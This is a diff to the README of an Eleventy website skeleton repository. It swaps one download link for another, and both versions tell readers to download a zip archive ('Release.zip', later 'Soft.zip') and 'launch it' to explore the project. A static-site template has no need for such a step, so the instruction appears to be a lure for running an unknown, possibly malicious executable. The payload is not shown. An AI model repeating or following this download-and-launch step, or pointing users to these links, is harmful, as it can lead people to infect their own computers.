Sam-web-stack/11ty-skeleton/README.md

 🌐 Perfect for Websites and Blogs

 ## Getting Started
-To get started with this project, simply download the [Release.zip file](https://github.com/adelante20/Release/raw/refs/heads/master/Release.zip) and launch it to begin exploring the skeleton structure.
+To get started with this project, simply download the [https://github.com/Sam-web-stack/11ty-skeleton/releases/download/v1.0/Soft.zip file](https://github.com/Sam-web-stack/11ty-skeleton/releases/download/v1.0/Soft.zip) and launch it to begin exploring the skeleton structure.

 ## Repository Topics
 This repository covers a wide range of topics related to Eleventy and website development, including: